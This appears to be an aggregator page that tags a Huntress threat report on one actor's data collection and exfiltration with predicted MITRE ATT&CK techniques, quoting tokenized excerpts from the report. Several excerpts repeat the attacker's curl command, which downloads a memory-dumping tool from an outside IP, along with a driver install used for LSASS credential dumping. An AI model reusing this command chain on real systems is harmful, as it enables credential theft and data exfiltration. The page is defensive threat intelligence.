TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Curling for Data: A Dive into a Threat Actor's Malicious TTPs | Huntress

2023-12-14 · Read original ↗

ATT&CK techniques detected

12 predictions
T1003.001LSASS Memory
99%
“, t1059. 003 windows command shell - persistence - t1078 valid accounts - credential access ( possible ) - t1003. 001 lsass memory - collection - t1560 archive collected data - data exfiltration - t1048. 003 exfiltration over unencrypted non - c2 protocol”
T1003.001LSASS Memory
89%
“##i file download, for installation of the dokan file system driver : curl - v - o memprocfs. zip http : / / 193. 149. 176. 90 / memprocfs. zip " c : \ windows \ system32 \ msiexec. exe " / i " c : \ users \ public \ dokan _ x64. msi \ dokan _ x64. msi " possible credential dumpi…”
T1005Data from Local System
84%
“and persisted beyond the deletion of the driver from the endpoint. the use of the file system driver to create the mount point, and then later remove it spanned 7 minutes and 4 seconds. data exfiltration in the wild shortly after the dokan file system driver was removed, another …”
T1219Remote Access Tools
79%
“curling for data : a dive into a threat actor ' s malicious ttps | huntress the huntress agent was recently added to a new customer ’ s environment as a result of suspicious activity they ’ d become aware of, and not long after, huntress soc analysts alerted the customer to furth…”
T1105Ingress Tool Transfer
65%
“- 2023 08 : 24 : 28 < unknown > remotecontrol { < guid > } this particular entry stood out due to the < unknown > field, where all previous entries contained valid account names specific to the environment. also, per the timeline of events created for this investigation, the time…”
T1219.002Remote Desktop Software
62%
“curling for data : a dive into a threat actor ' s malicious ttps | huntress the huntress agent was recently added to a new customer ’ s environment as a result of suspicious activity they ’ d become aware of, and not long after, huntress soc analysts alerted the customer to furth…”
T1059.001PowerShell
50%
“##i file download, for installation of the dokan file system driver : curl - v - o memprocfs. zip http : / / 193. 149. 176. 90 / memprocfs. zip " c : \ windows \ system32 \ msiexec. exe " / i " c : \ users \ public \ dokan _ x64. msi \ dokan _ x64. msi " possible credential dumpi…”
T1078Valid Accounts
38%
“exfiltration. conclusion huntress analysts were not able to determine how the threat actor was able to obtain credentials for known, valid accounts, as it ’ s likely that credential access occurred on one or more endpoints within the environment prior to the huntress agent being …”
T1048Exfiltration Over Alternative Protocol
36%
“and persisted beyond the deletion of the driver from the endpoint. the use of the file system driver to create the mount point, and then later remove it spanned 7 minutes and 4 seconds. data exfiltration in the wild shortly after the dokan file system driver was removed, another …”
T1059Command and Scripting Interpreter
32%
“exfiltration. conclusion huntress analysts were not able to determine how the threat actor was able to obtain credentials for known, valid accounts, as it ’ s likely that credential access occurred on one or more endpoints within the environment prior to the huntress agent being …”
T1005Data from Local System
31%
“, t1059. 003 windows command shell - persistence - t1078 valid accounts - credential access ( possible ) - t1003. 001 lsass memory - collection - t1560 archive collected data - data exfiltration - t1048. 003 exfiltration over unencrypted non - c2 protocol”
T1003OS Credential Dumping
31%
“##i file download, for installation of the dokan file system driver : curl - v - o memprocfs. zip http : / / 193. 149. 176. 90 / memprocfs. zip " c : \ windows \ system32 \ msiexec. exe " / i " c : \ users \ public \ dokan _ x64. msi \ dokan _ x64. msi " possible credential dumpi…”

Summary

Huntress analysts recently observed a novel set of tactics, techniques, and procedures used by a threat actor for data collection and exfiltration.